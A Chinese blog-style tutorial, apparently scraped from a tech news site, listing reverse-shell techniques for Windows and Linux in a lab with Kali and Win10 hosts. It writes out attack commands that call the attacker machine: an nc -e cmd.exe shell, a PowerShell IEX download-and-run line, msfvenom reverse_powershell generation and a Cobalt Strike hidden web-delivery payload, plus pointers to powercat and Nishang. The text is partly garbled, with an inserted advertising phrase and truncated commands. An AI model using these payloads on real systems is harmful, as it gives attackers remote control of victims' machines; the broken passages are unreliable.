反弹shell的方法有哪些


这篇文章主要介绍反弹shell的方法有哪些,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!什么是反弹shell(reverse shell)?就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么需要反弹shell?反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深免费云主机域名入。以下详细介绍Windows和Linux系统下反弹shell的几种方式。实验环境:Win10 192.168.2.102 NC监听Kali 192.168.2.103 自带工具在特殊情况可以使用base64编码执行bash反弹shell编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html在kali中执行会解析成编码前的bash命令-e后面跟的参数代表的是在创建连接后执行的程序,这里代表在连接到远程后可以在远程执行一个本地shell(/bin/bash),也就是反弹一个shell给远程,可以看到远程已经成功反弹到了shell,并且可以执行命令。Kali开启apache服务,把bash命令写入html文件,只要文本包含bash一句话即可。whois -h 192.168.2.102 -p 4444 `pwd` //反弹的shell只能执行后面带的命令php反弹shell和python的方式差不多①用IEX下载远程PS1脚本回来权限绕过执行使用powershell执行IEX (New-Object② powercat下载地址:https://github.com/besimorhino/powercat //下载到本地执行powercat为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat服务端反弹:nc 192.168.2.103 4444 -e c:windowssystem32cmd.exeNishang下载地址:https://github.com/samratashok/nishangNishang是一个基于PowerShell的攻击框架,整合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell将nishang下载到攻击者本地,在目标机使用powershell执行以下命令攻击机监听 nc -lvup 4444利用上面下载的还是放在攻击机上在目标机中powershell执行以下命令我们直接可以使用 msfvenom -l 结合关键字过滤(如cmd/windows/reverse),找出我们需要的各类反弹一句话payload的路径信息。依照前面查找出的命令生成一句话payload路径,我们使用如下的命令生成反弹一句话,然后复制粘贴到靶机上运行即可。msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.2.103 LPORT=4444靶机执行使用powershell执行payload攻击机返回shellCobalt strike的Scripted Web Delivery模块,可通过bitsadmin、powershell、python、regsvR32等进行反弹shell,类似metasploit的web_delivery模块①运行服务端./teamserver 192.168.2.103 123 #123为连接密码②运行客户端:Windows运行cobaltstrike.jar #用户名随便输入 密码123③开启监听:点击Cobalt Strike->Listenerspayload可选择windows/beacon_http/reverse_http说明:其中windows/beacon 是Cobalt Strike自带的模块,包括dns,http,https,smb四种方式的监听器,windows/foreign 为外部监听器,即msf或者Armitage的监听器。④生成powershell payload:点击Attack -> Web Drive-by -> Scripted Web DeliveryType选择 powershell生成的payload:powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.2.103:8887/a’))”⑤生成代码已经给出了,在windows上执行以上是“反弹shell的方法有哪些”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注云编程开发博客行业资讯频道!

相关推荐: 使用haproxy 实现 http/ssh/mstsc复用

网上较多HTTP/SSH复用,但实际环境中,使用HAPROXY做IIS负载均衡时,还需要使用80端口来使用远程桌面管理服务器。近日通过Wireshark抓包,找到了TPKT的报头字段,终于成功实现RDP协议复用:注:通常RDP使用TPKT作为其传输协议,TPK…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/03 12:51
下一篇 02/03 13:17